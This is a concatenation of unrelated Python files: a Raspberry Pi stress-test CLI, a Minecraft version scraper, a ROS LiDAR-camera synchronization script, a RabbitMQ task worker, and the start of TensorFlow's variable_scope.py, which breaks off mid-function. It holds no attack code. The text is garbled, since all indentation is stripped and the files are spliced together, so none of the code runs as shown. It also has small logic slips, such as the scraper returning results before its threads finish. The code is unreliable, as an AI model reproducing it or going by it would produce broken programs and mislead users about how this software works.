paper.set_interval(TIME_INTERVAL)
paper.modes('auto', 3840)
next_file = paper.get_next_file()
# next(next_file)
print("通过回车空格键确认")
paper.next()
timer = Time(paper.next, TIME_INTERVAL)
thread2 = threading.Thread(target = check_input(timer, paper), name = "input check")
|
cli.py
|
import argparse
import datetime
import sys
import threading
import time
import matplotlib.pyplot as plt
import numpy
import yaml
from .__about__ import __copyright__, __version__
from .main import (
cooldown,
measure_temp,
measure_core_frequency,
measure_ambient_temperature,
test,
)
def _get_version_text():
return "\n".join(
[
"stressberry {} [Python {}.{}.{}]".format(
__version__,
sys.version_info.major,
sys.version_info.minor,
sys.version_info.micro,
),
__copyright__,
]
)
def _get_parser_run():
parser = argparse.ArgumentParser(
description="Run stress test for the Raspberry Pi."
)
parser.add_argument(
"--version", "-v", action="version", version=_get_version_text()
)
parser.add_argument(
"-n",
"--name",
type=str,
default="stressberry data",
help="name the data set (default: 'stressberry data')",
)
parser.add_argument(
"-t",
"--temperature-file",
type=str,
default=None,
help="temperature file e.g /sys/class/thermal/thermal_zone0/temp (default: vcgencmd)",
)
parser.add_argument(
"-d",
"--duration",
type=int,
default=300,
help="stress test duration in seconds (default: 300)",
)
parser.add_argument(
"-i",
"--idle",
type=int,
default=150,
help="idle time in seconds at start and end of stress test (default: 150)",
)
parser.add_argument(
"--cooldown",
type=int,
default=60,
help="poll interval seconds to check for stable temperature (default: 60)",
)
parser.add_argument(
"-c",
"--cores",
type=int,
default=None,
help="number of CPU cores to stress (default: all)",
)
parser.add_argument(
"-f",
"--frequency-file",
type=str,
default=None,
help="CPU core frequency file e.g. /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq (default: vcgencmd)",
)
parser.add_argument(
"-a",
"--ambient",
type=str,
nargs=2,
default=None,
help="measure ambient temperature. Sensor Type [11|22|2302] <GPIO Number> e.g. 2302 26",
)
parser.add_argument("outfile", type=argparse.FileType("w"), help="output data file")
return parser
def run(argv=None):
parser = _get_parser_run()
args = parser.parse_args(argv)
# Cool down first
print("Awaiting stable baseline temperature...")
cooldown(interval=args.cooldown, filename=args.temperature_file)
# Start the stress test in another thread
t = threading.Thread(
target=lambda: test(args.duration, args.idle, args.cores), args=()
)
t.start()
times = []
temps = []
freqs = []
ambient = []
while t.is_alive():
times.append(time.time())
temps.append(measure_temp(args.temperature_file))
freqs.append(measure_core_frequency(args.frequency_file))
if args.ambient:
ambient_temperature = measure_ambient_temperature(
sensor_type=args.ambient[0], pin=args.ambient[1]
)
if ambient_temperature is None:
# Reading the sensor can return None if it times out.
# If we never had a good reading, it is probably a configuration error.
# Otherwise use the last known value if available, or zero as a worst case.
if not ambient:
message = "Could not read ambient temperature sensor {} on pin {}".format(
args.ambient[0], args.ambient[1]
)
else:
message = "WARN - Could not read ambient temperature, using last good value"
print(message)
ambient_temperature = next(
(temp for temp in reversed(ambient) if temp is not None), 0
)
ambient.append(ambient_temperature)
delta_t = temps[-1] - ambient[-1]
print(
"Temperature (current | ambient | ΔT): {:4.1f}°C | {:4.1f}°C | {:4.1f}°C - Frequency: {:4.0f}MHz".format(
temps[-1], ambient[-1], delta_t, freqs[-1]
)
)
else:
print(
"Current temperature: {:4.1f}°C - Frequency: {:4.0f}MHz".format(
temps[-1], freqs[-1]
)
)
# Choose the sample interval such that we have a respectable number of
# data points
t.join(2.0)
# normalize times
time0 = times[0]
times = [tm - time0 for tm in times]
args.outfile.write(
"# This file was created by stressberry v{} on {}\n".format(
__version__, datetime.datetime.now()
)
)
yaml.dump(
{
"name": args.name,
"time": times,
"temperature": temps,
"cpu frequency": freqs,
"ambient": ambient,
},
args.outfile,
)
return
def plot(argv=None):
parser = _get_parser_plot()
args = parser.parse_args(argv)
data = [yaml.load(f, Loader=yaml.SafeLoader) for f in args.infiles]
# sort the data such that the data series with the lowest terminal
# temperature is plotted last (and appears in the legend last)
terminal_temps = [d["temperature"][-1] for d in data]
order = [i[0] for i in sorted(enumerate(terminal_temps), key=lambda x: x[1])]
# actually plot it
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
for k in order[::-1]:
if args.delta_t:
temperature_data = numpy.subtract(
data[k]["temperature"], data[k]["ambient"]
)
else:
temperature_data = data[k]["temperature"]
ax1.plot(
data[k]["time"], temperature_data, label=data[k]["name"], lw=args.line_width
)
ax1.grid()
if not args.hide_legend:
ax1.legend(loc="upper left", bbox_to_anchor=(1.03, 1.0), borderaxespad=0)
if args.delta_t:
plot_yaxis_label = "Δ temperature °C (over ambient)"
else:
plot_yaxis_label = "temperature °C"
ax1.set_xlabel("time (s)")
ax1.set_ylabel(plot_yaxis_label)
ax1.set_xlim([data[-1]["time"][0], data[-1]["time"][-1]])
if args.temp_lims:
ax1.set_ylim(*args.temp_lims)
# Only plot frequencies when using a single input file
if len(data) == 1 and args.frequency:
ax2 = plt.twinx()
ax2.set_ylabel("core frequency (MHz)")
if args.freq_lims:
ax2.set_ylim(*args.freq_lims)
try:
for k in order[::-1]:
ax2.plot(
data[k]["time"],
data[k]["cpu frequency"],
label=data[k]["name"],
color="C1",
alpha=0.9,
lw=args.line_width,
)
ax1.set_zorder(ax2.get_zorder() + 1) # put ax1 plot in front of ax2
ax1.patch.set_visible(False) # hide the 'canvas'
except KeyError:
print("Source data does not contain CPU frequency data.")
if args.outfile is not None:
plt.savefig(
args.outfile,
transparent=args.transparent,
bbox_inches="tight",
dpi=args.dpi,
)
else:
plt.show()
return
def _get_parser_plot():
parser = argparse.ArgumentParser(description="Plot stress test data.")
parser.add_argument(
"--version", "-v", action="version", version=_get_version_text()
)
parser.add_argument(
"infiles",
nargs="+",
type=argparse.FileType("r"),
help="input YAML file(s) (default: stdin)",
)
parser.add_argument(
"-o",
"--outfile",
help=(
"if specified, the plot is written to this file "
"(default: show on screen)"
),
)
parser.add_argument(
"-t",
"--temp-lims",
type=float,
nargs=2,
default=None,
help="limits for the temperature (default: data limits)",
)
parser.add_argument(
"-d",
"--dpi",
type=int,
default=None,
help="image resolution in dots per inch when written to file",
)
parser.add_argument(
"-f",
"--frequency",
help="plot CPU core frequency (single input files only)",
action="store_true",
)
parser.add_argument(
"-l",
"--freq-lims",
type=float,
nargs=2,
default=None,
help="limits for the frequency scale (default: data limits)",
)
parser.add_argument("--hide-legend", help="do not draw legend", action="store_true")
parser.add_argument(
"--not-transparent",
dest="transparent",
help="do not make images transparent",
action="store_false",
default=True,
)
parser.add_argument(
"-lw", "--line-width", type=float, default=None, help="line width"
)
parser.add_argument(
"--delta-t",
action="store_true",
default=False,
help="Use Delta-T (core - ambient) temperature instead of CPU core temperature",
)
return parser
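# Hedged usage sketch (console-script names are assumed; check the package's
# entry points): record a stress run with the parser above, then plot the
# resulting YAML file(s).
#
#     stressberry-run -n "heatsink test" -d 600 -i 120 out.yaml
#     stressberry-plot out.yaml -f -o out.png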
|
versionScraper.py
|
import urllib.request, urllib.error, urllib.parse
from bs4 import BeautifulSoup
import string
import json
from threading import Thread
def _getVanilla():
def _vanillaGetDirect(url):
user_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'
headers = {'User-Agent':user_agent,}
request = urllib.request.Request(url, None, headers)
response = urllib.request.urlopen(request)
text = response.read()
soup = BeautifulSoup(text, 'html.parser')
data = soup.findAll('a', class_="button")
direct = data[0]['href']
vanilla[url.split('/')[-1]] = direct  # key by version; url ends with the caller's a['href'] segment
vanilla = {}
url = "https://mcversions.net/"
user_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'
headers = {'User-Agent':user_agent,}
request = urllib.request.Request(url, None, headers)
response = urllib.request.urlopen(request)
text = response.read()
soup = BeautifulSoup(text, 'html.parser')
data = soup.findAll('div', class_="items")
for div in data:
links = div.findAll('a')
for a in links:
if a['href'].startswith('/download/') and '.' in a['href'] and not (a['href'].split('/')[-1][0] in chars):
Thread(target=_vanillaGetDirect,args=("https://mcversions.net" + a['href'],)).start()
return vanilla
def _getCraftBukkit():
craftbukkit = {}
url = "https://getbukkit.org/download/craftbukkit"
user_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'
headers = {'User-Agent':user_agent,}
request = urllib.request.Request(url, None, headers)
response = urllib.request.urlopen(request)
text = response.read()
soup = BeautifulSoup(text, 'html.parser')
data = soup.findAll('div', class_="col-md-12 download")
for div in data:
metadiv = div.find('div', class_="col-sm-3")
version = str(metadiv).split('<h2>')[-1].split('</h2>')[0]
links = div.findAll('a')
for a in links:
if 'https://getbukkit.org/' in a['href']:
craftbukkit[version] = a['href']
print(craftbukkit)
return craftbukkit
def getVersions():
vanilla = _getVanilla()
craftbukkit = _getCraftBukkit()
spigot = ''
papermc = ''
print(vanilla, craftbukkit, spigot, papermc, sep='\n')
return {'Vanilla': vanilla, 'CraftBukkit': craftbukkit,
'Spigot': spigot, 'PaperMC': papermc}
chars = list(string.ascii_lowercase)
final = getVersions()
print(json.dumps(final, indent=4))
|
synchronization.py
|
#!/usr/bin/env python2.7
''' CONFIDENTIAL
Copyright (c) 2021 Eugeniu Vezeteu,
Department of Remote Sensing and Photogrammetry,
Finnish Geospatial Research Institute (FGI), National Land Survey of Finland (NLS)
PERMISSION IS HEREBY LIMITED TO FGI'S INTERNAL USE ONLY. THE CODE
MAY BE RE-LICENSED, SHARED, OR TAKEN INTO OTHER USE ONLY WITH
A WRITTEN CONSENT FROM THE HEAD OF THE DEPARTMENT.
The software is provided "as is", without warranty of any kind, express or
implied, including but not limited to the warranties of merchantability,
fitness for a particular purpose and noninfringement. In no event shall the
authors or copyright holders be liable for any claim, damages or other
liability, whether in an action of contract, tort or otherwise, arising from,
out of or in connection with the software or the use or other dealings in the
software.
'''
try:
import rospy
from sensor_msgs.msg import Image, CameraInfo, PointCloud2, PointField
from cv_bridge import CvBridge, CvBridgeError
import message_filters
import cv2
import numpy as np
import ros_numpy
import cv2.aruco as aruco
import math
import pickle
import open3d
import std_msgs.msg
import sensor_msgs.point_cloud2 as pcl2
import pcl
import matplotlib.pyplot as plt
from collections import deque
from sensor_msgs import point_cloud2
from sklearn import preprocessing
from scipy.spatial.distance import euclidean
from fastdtw import fastdtw
from testNode.msg import extras
from pyquaternion import Quaternion
import matplotlib
import pandas as pd
except:
print('Change python version')
from termcolor import colored
from scipy.spatial import distance_matrix
import struct
import rosbag
def getRGBfromI(RGBint):
blue = RGBint & 255
green = (RGBint >> 8) & 255
red = (RGBint >> 16) & 255
#return red, green, blue
return blue, green, red #return BGR
def getIfromRGB(rgb):
red = rgb[0]
green = rgb[1]
blue = rgb[2]
#print red, green, blue
RGBint = (red<<16) + (green<<8) + blue
return RGBint
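# Worked example of the packing above (comment only, so module behaviour is
# unchanged): (R, G, B) = (10, 20, 30) packs to 10*2**16 + 20*2**8 + 30 = 660510,
# and getRGBfromI(660510) unpacks it in BGR order as (30, 20, 10), matching the
# "return BGR" note in getRGBfromI.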
def load_obj(name):
with open('/home/eugeniu/Desktop/my_data/CameraCalibration/data/saved_files/' + name + '.pkl', 'rb') as f:
return pickle.load(f)
def get_z(T_cam_world, T_world_pc, K):
R = T_cam_world[:3, :3]
t = T_cam_world[:3, 3]
proj_mat = np.dot(K, np.hstack((R, t[:, np.newaxis])))
xyz_hom = np.hstack((T_world_pc, np.ones((T_world_pc.shape[0], 1))))
xy_hom = np.dot(proj_mat, xyz_hom.T).T
z = xy_hom[:, -1]
z = np.asarray(z).squeeze()
return z
def readCalibration():
name = 'inside'
# name = 'outside'
camera_model = load_obj('{}_combined_camera_model'.format(name))
camera_model_rectify = load_obj('{}_combined_camera_model_rectify'.format(name))
K_left = camera_model['K_left']
K_right = camera_model['K_right']
D_left = camera_model['D_left']
D_right = camera_model['D_right']
K = K_right
D = D_right
calib_file = '/home/eugeniu/catkin_ws/src/testNode/CAMERA_CALIBRATION/combined_extrinsics{}.npz'
calib_file = '/home/eugeniu/catkin_ws/src/testNode/CAMERA_CALIBRATION/solvePnP_extrinsicscharuco.npz'
with open(calib_file, 'r') as f:
data = f.read().split()
# print('data:{}'.format(data))
qx = float(data[0])
qy = float(data[1])
qz = float(data[2])
qw = float(data[3])
tx = float(data[4])
ty = float(data[5])
tz = float(data[6])
q = Quaternion(qw, qx, qy, qz).transformation_matrix
q[0, 3], q[1, 3], q[2, 3] = tx, ty, tz
tvec = q[:3, 3]
rot_mat = q[:3, :3]
rvec, _ = cv2.Rodrigues(rot_mat)
return rvec, tvec,q, K,D
rvec, tvec,q, K, D = readCalibration()
rospy.init_node('testNode', anonymous=True)
global myI
myI = 10
bridge = CvBridge()
display = True
display = False
plotTimeLine = False
useColor = True
#useColor = False
useMeanTime = True # use the mean time for each laser scan
#useMeanTime = False
velodyne_points = '/lidar_VLS128_Center_13202202695611/velodyne_points'
left_cam = '/camera_IDS_Left_4103423533/image_raw'
left_cam_topic_extras = '/camera_IDS_Left_4103423533/extras'
left_cam = '/camera_IDS_Right_4103423537/image_raw'
left_cam_topic_extras = '/camera_IDS_Right_4103423537/extras'
right_cam = '/camera_IDS_Left_4103423533/image_raw'
Syncronized_Lidar_pub = rospy.Publisher(velodyne_points, PointCloud2, queue_size=200)
Syncronized_Cam_pub = rospy.Publisher(left_cam, Image, queue_size=200)
r,g,b, a = int(0 * 255.0),int(1 * 255.0),int(0 * 255.0), 255
rgb = struct.unpack('I', struct.pack('BBBB', b, g, r, a))[0]
r,g,b, a = int(1 * 255.0),int(0 * 255.0),int(0 * 255.0), 255
rgb_red = struct.unpack('I', struct.pack('BBBB', b, g, r, a))[0]
cmap = matplotlib.cm.get_cmap('hsv')
def hsv_to_rgb(h, s, v):
if s == 0.0:
return v, v, v
i = int(h * 6.0)
f = (h * 6.0) - i
p = v * (1.0 - s)
q = v * (1.0 - s * f)
t = v * (1.0 - s * (1.0 - f))
i = i % 6
if i == 0:
return v, t, p
if i == 1:
return q, v, p
if i == 2:
return p, v, t
if i == 3:
return p, q, v
if i == 4:
return t, p, v
if i == 5:
return v, p, q
removeShadow = True
#removeShadow = False
global STOP, cloud_points_save, left_image_Save, right_image_Save
def publishSyncronized_msg(cloud_synchronized,image_synchronized, image_synchronized2=None, pixel_opacity = 1):
try:
# publish lidar
header = std_msgs.msg.Header()
header.stamp = rospy.Time.now()
header.frame_id = 'VLS128_Center'
# columns=["X", "Y", "Z",'rgb',"intens","ring","time"]
if useColor:
objPoints_left = cloud_synchronized[:,:3]
Z = get_z(q, objPoints_left, K)
cloud_synchronized = cloud_synchronized[Z > 0]
objPoints_left = objPoints_left[Z > 0]
points2D, _ = cv2.projectPoints(objPoints_left, rvec, tvec, K, D)
points2D = np.squeeze(points2D)
image = bridge.imgmsg_to_cv2(image_synchronized, "bgr8")
inrange = np.where(
(points2D[:, 0] >= 0) &
(points2D[:, 1] >= 0) &
(points2D[:, 0] < image.shape[1] - 1) &
(points2D[:, 1] < image.shape[0] - 1)
)
points2D = points2D[inrange[0]].round().astype('int')
cloud_synchronized = cloud_synchronized[inrange[0]]
#filter again here -> save the closest to the camera
distance = np.linalg.norm(cloud_synchronized[:, :3], axis=1)
if removeShadow:
'''sort points by distance'''
idx_sorted = np.argsort(distance) #ascending
idx_sorted = idx_sorted[::-1] #descending
cloud_synchronized = cloud_synchronized[idx_sorted]
points2D = points2D[idx_sorted]
distance = distance[idx_sorted]
#cv2.imshow('image ',image)
#cv2.waitKey(1)
MIN_DISTANCE, MAX_DISTANCE = np.min(distance), np.max(distance)
colours = (distance - MIN_DISTANCE) / (MAX_DISTANCE - MIN_DISTANCE)
colours = np.asarray([np.asarray(hsv_to_rgb(0.75 * c, np.sqrt(pixel_opacity), 1.0)) for c in colours])
cols = pixel_opacity * 255 * colours
# print('colours:{}, cols:{}'.format(np.shape(colours), np.shape(cols)))
colors_left = image[points2D[:, 1], points2D[:, 0], :]
colors_left = np.array([getIfromRGB(col) for col in colors_left]).squeeze()
#greenColors = np.ones(len(cloud_synchronized))*rgb
cloud_synchronized[:, 3]=colors_left
image = cv2.Canny(image, 100, 200)
#for i in range(len(points2D)):
#cv2.circle(image, tuple(points2D[i]), 2, (0, 255, 0), 1)
#cv2.circle(image, tuple(points2D[i]), 2, cols[i], -1)
_pcl = pcl2.create_cloud(header=header, fields=fields, points=cloud_synchronized)
Syncronized_Lidar_pub.publish(_pcl)
# publish camera
Syncronized_Cam_pub.publish(bridge.cv2_to_imgmsg(image))
else:
_pcl = pcl2.create_cloud(header=header, fields=fields, points=cloud_synchronized)
Syncronized_Lidar_pub.publish(_pcl)
#publish camera
Syncronized_Cam_pub.publish(image_synchronized)
cloud_points_save = cloud_synchronized
left_image_Save = image_synchronized
right_image_Save = image_synchronized2
except Exception as e:
rospy.logerr(e)
def do_job(path, lidar_msgs, cam, cam_right):
global myI
print('cam_right -> {}'.format(np.shape(cam_right)))
print('got path:{}, lidar_msgs:{}, cam:{}'.format(np.shape(path), np.shape(lidar_msgs), np.shape(cam)))
if useMeanTime:
for (x1, x2) in path:
cloud_synchronized = lidar_msgs[x1]
image_synchronized = cam[x2]
try:
image_synchronized2 = cam_right[x2]
except:
image_synchronized2 = cam_right[x2-1]
# print('cloud_synchronized:{}, image_synchronized:{}'.format(np.shape(cloud_synchronized), np.shape(image_synchronized)))
publishSyncronized_msg(cloud_synchronized,image_synchronized, image_synchronized2)
l=bridge.imgmsg_to_cv2(image_synchronized, "bgr8")
r=bridge.imgmsg_to_cv2(image_synchronized2, "bgr8")
cv2.imshow('left', cv2.resize(l,None,fx=.4,fy=.4))
cv2.imshow('right', cv2.resize(r,None,fx=.4,fy=.4))
k = cv2.waitKey(1)
if k==ord('s'):
print('Save cv2')
print('Saved {}, {}'.format(np.shape(l), np.shape(r)))
cv2.imwrite('/home/eugeniu/left_{}.png'.format(myI), l)
cv2.imwrite('/home/eugeniu/right_{}.png'.format(myI), r)
with open('/home/eugeniu/cloud_{}.npy'.format(myI), 'wb') as f:
np.save(f, cloud_synchronized)
myI+=1
else:
_lidar_synchro = []
lidar_msgs = np.vstack(lidar_msgs)
print('lidar_msgs -> {}'.format(np.shape(lidar_msgs)))
'''
vstack the lidar msg list;
for each unique camera index in path:
- take all lidar points that belong to it
- publish them together
'''
unique_cam, indices = np.unique(path[:,1], return_index=True)
for i,u in enumerate(unique_cam):
inrange = np.where(path[:,1]==u) #take all lidar points that belongs to this cam msg
cloud_synchronized = lidar_msgs[inrange[0]]
image_synchronized = cam[i]
#print('cloud_synchronized:{}, image_synchronized:{}'.format(np.shape(cloud_synchronized), np.shape(image_synchronized)))
publishSyncronized_msg(cloud_synchronized,image_synchronized)
print(colored('Data published','green'))
cv2.destroyAllWindows()
k = 0
plot_data_left = deque(maxlen=200)
LiDAR_msg, LeftCam_msg, LeftCam_TimeSeries = [],[],[]
RightCam_msg = []
chessBag = '/home/eugeniu/chessboard_Lidar_Camera.bag'
charucoBag = '/home/eugeniu/charuco_LiDAR_Camera.bag'
bag = rosbag.Bag(charucoBag)
if display:
if plotTimeLine:
fig, (ax, ax2, ax3) = plt.subplots(3, 1)
else:
fig, (ax,ax2) = plt.subplots(2, 1)
ax.grid()
ax2.grid()
if plotTimeLine:
    ax3.grid()
ppsLine, = ax.plot([0], 'b', label='PPS pulse')
ax.legend()
import time
import threading
skip = 1
history = []
from pynput.keyboard import Key, Listener
global STOP, cloud_points_save, left_image_Save, right_image_Save
STOP = False
def on_press(key):
try:
print('alphanumeric key {0} pressed'.format(key.char))
if key.char == 's':
print('Save data----------------------------------------')
else:
global STOP
STOP = True
except AttributeError:
print('special key {0} pressed'.format(key))
listener = Listener(on_press=on_press)
listener.start()
for topic, msg, t in bag.read_messages(topics=[left_cam, left_cam_topic_extras, velodyne_points, right_cam]):
#print('topic -> {}, msg->{} t->{}'.format(topic, np.shape(msg),t))
if topic == left_cam_topic_extras:# check pps and apply synchronization
pps = int(msg.pps)
m = 'pps->{}, LiDAR->{}, Cam->{}'.format(pps, np.shape(LiDAR_msg), np.shape(LeftCam_msg))
if pps == 1:
print(colored(m, 'red'))
lidar,cam = np.copy(LiDAR_msg),np.copy(LeftCam_msg) #get the copy of current buffer
cam_right = np.copy(RightCam_msg)
Cam_Time_series = np.copy(LeftCam_TimeSeries)
k=0.
LiDAR_msg, LeftCam_msg, LeftCam_TimeSeries = [], [], [] #clear the storage
RightCam_msg = []
#synchronize them
print('Cam_Time_series -> {}'.format(Cam_Time_series))
#lidar_msgs = np.array([np.array(list(pcl2.read_points(cloud_msg))).squeeze()[::skip,:] for cloud_msg in lidar]).ravel() # Msg x N x 6
lidar_msgs = lidar
LiDAR_Time_series = []
if useMeanTime:
for cloud in lidar_msgs:
LiDAR_Time_series = np.hstack((LiDAR_Time_series, np.mean(cloud[:, -1])))
else:
for cloud in lidar_msgs:
LiDAR_Time_series = np.hstack((LiDAR_Time_series, np.asarray(cloud[:,-1]).squeeze()))
LiDAR_Time_series = np.array(LiDAR_Time_series).squeeze()
LiDAR_Time_series = np.array([math.fmod(t, 2.0) for t in LiDAR_Time_series])
print('LiDAR_Time_series -> {}'.format(np.shape(LiDAR_Time_series)))
print('LiDAR_Time_series -> {}'.format(LiDAR_Time_series[:20]))
#DTW alignment
#_, path = fastdtw(LiDAR_Time_series, Cam_Time_series, dist=euclidean)
#path = np.array(path)
dist_mat = distance_matrix(LiDAR_Time_series[:, np.newaxis], Cam_Time_series[:, np.newaxis])
neighbours = np.argsort(dist_mat, axis=1)[:, 0] # for each lidar msg get the closest neighbour from the camera
path = np.array([np.linspace(start = 0, stop = len(LiDAR_Time_series)-1, num = len(LiDAR_Time_series), dtype = int), neighbours]).T
if LiDAR_Time_series[-1] < LiDAR_Time_series[-2]:
print(colored('delete last element', 'red'))
path = path[:-2]
print('path -> {}'.format(np.shape(path)))
publish = True
publish = False
start = time.time()
if publish:
    do_job(path, lidar_msgs, cam, cam_right)
#_thread = threading.Thread(target=do_job,args=(path, lidar_msgs, cam))
#_thread.daemon = True
#_thread.start()
else:
history.append([path, lidar_msgs, cam, cam_right])
end = time.time()
print('the publish took {}'.format(end-start))
if display:
ax2.clear()
x,y = LiDAR_Time_series,Cam_Time_series
offsetY,offsetX = 3,int(len(path)/2)
ax2.plot(y + offsetY, c='b', label='Cam-{}'.format(len(y)), linewidth=2)
ax2.plot(np.linspace(start = 0, stop = len(x)-1, num = len(x), dtype = int)+offsetX,x, c='r', label='LiDAR-{}'.format(len(x)), linewidth=2)
for (x1, x2) in path:
ax2.plot([x1+offsetX, x2], [x[x1], y[x2] + offsetY], c='k', alpha=.5, linewidth=1)
ax2.grid()
ax2.legend()
#else:
#print(m)
if display:
plot_data_left.append(pps)
ppsLine.remove()
ppsLine, = ax.plot(plot_data_left, 'b', label='left cam')
fig.canvas.draw_idle()
plt.pause(0.001)
elif topic == left_cam: #store the camera msgs
LeftCam_msg.append(msg)
LeftCam_TimeSeries.append(k)
k += 0.05 # seconds
elif topic == velodyne_points: #store the LiDAR msgs
fields = msg.fields
if useColor:
fields.append(PointField('rgb', 12, PointField.UINT32, 1))
#LiDAR_msg.append(msg)
m = np.array(list(pcl2.read_points(msg))).squeeze() #N x 6
inrange = np.where(m[:, 1] > 1.5)
LiDAR_msg.append(m[inrange[0]])
elif topic == right_cam:
RightCam_msg.append(msg)
#columns=["X", "Y", "Z","intens","ring","time"]
if STOP:
print('Break ---------------------------')
break
bag.close()
print('Start publishing')
plt.close()
for item in history:
path, lidar_msgs, cam, cam_right = item
do_job(path, lidar_msgs, cam, cam_right)
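# Hedged sketch of the nearest-neighbour time alignment used above (toy
# timestamps, not taken from the bag file): for each LiDAR scan we pick the
# camera frame whose (mod-2s) timestamp is closest, which is what the
# distance_matrix / argsort pair computes.
#
#     lidar_t = np.array([0.00, 0.11, 0.22, 0.33])
#     cam_t = np.array([0.00, 0.05, 0.10, 0.15, 0.20, 0.25, 0.30])
#     d = distance_matrix(lidar_t[:, np.newaxis], cam_t[:, np.newaxis])
#     nn = np.argsort(d, axis=1)[:, 0]      # -> [0, 2, 4, 6]
#     path = np.array([np.arange(len(lidar_t)), nn]).T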
|
minion.py
|
from arbiter import Minion
from multiprocessing import Process
from time import sleep
import logging
app = Minion(host="localhost", port=5672, user='user', password='password', queue="default")
@app.task(name="add")
def add(x, y):
logging.info("Running task 'add'")
# task that initiates a new task within the same app
increment = 0
for message in app.apply('simple_add', task_args=[3, 4]):
if isinstance(message, dict):
increment = message["result"]
logging.info("sleep done")
return x + y + increment
@app.task(name="simple_add")
def adds(x, y):
from time import sleep
sleep(10)
logging.info(f"Running task 'add_small' with params {x}, {y}")
return x + y
@app.task(name="add_in_pipe")
def addp(x, y, upstream=0):
logging.info("Running task 'add_in_pipe'")
return x + y + upstream
@app.task(name="long_running")
def long_task():
sleep(180)
return "Long Task"
def run(rpc):
if rpc:
app.rpc(workers=1, blocking=True)
else:
app.run(workers=10)
def start_minion(rpc: bool = False) -> Process:
p = Process(target=run, args=(rpc,))
p.start()
sleep(5) # some time to start Minion
return p
def stop_minion(p: Process):
p.terminate()
p.join()
if __name__ == "__main__":
run(False)
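# Hedged usage sketch (comment only, e.g. for tests; assumes the RabbitMQ
# broker at localhost:5672 with the credentials above is reachable):
#
#     p = start_minion()                        # spawn a child process with 10 workers
#     for message in app.apply("add", task_args=[1, 2]):
#         print(message)                        # dict messages carry the "result" key, as above
#     stop_minion(p)                            # terminate and join the child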
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
